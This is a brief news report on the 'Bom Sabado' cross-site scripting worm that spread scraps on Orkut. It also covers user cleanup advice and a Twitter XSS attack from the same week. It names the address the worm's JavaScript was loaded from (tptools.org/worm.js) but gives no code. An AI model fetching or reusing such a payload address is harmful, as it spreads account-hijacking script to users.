Orkut Attacked By ‘Bom Sabado’ Worm

In the second major XSS (cross-site scripting) attack on a major social networking service this week after Twitter, Orkut, a social networking site owned by Google was flooded with “Bom Sabado” scraps. “Bom Sabado” which means “Good Saturday” in Portuguese, the official language of Brazil.

As per the discussion going on at the official Orkut help forum, the worm seems to be posting scraps with the text “Bom Sabado” and adding affected users to new Orkut groups. Similar XSS attacks have targeted Orkut users in the past too. Experts have advised users to avoid logging on to Orkut till Orkut engineers fix the security hole and not to click on any suspicious links. Orkut had just last month announced new updates to the website.


If you are a Orkut user and have received a scrap “Bom Sabado” from one or more of your friends, then you are under attack and you should clean your browser cookies, history and cache. You should also change your password and password retrieve questions by visiting https://www.google.com/accounts/ManageAccount?hl=en. Switch back to old Orkut and then delete the scrap “Bomb Sabado.” Avoid visiting profiles of friends who are infected or who have sent you the scraps. If you are Firefox user then use NoScript Addon. More information can be found here.

As of now, we have seen that the malicious scrap was downloading a JavaScript file from tptools.org/worm.js. On investigating, we have found that the site is now suspended by its host.

Earlier this week, the popular microblogging website Twitter was also at the receiving end of an XSS exploit. The attack, which emerged and was shut down within hours on Tuesday morning, involved a XSS flaw that allowed users to run JavaScript programs on other computers.

You may also like...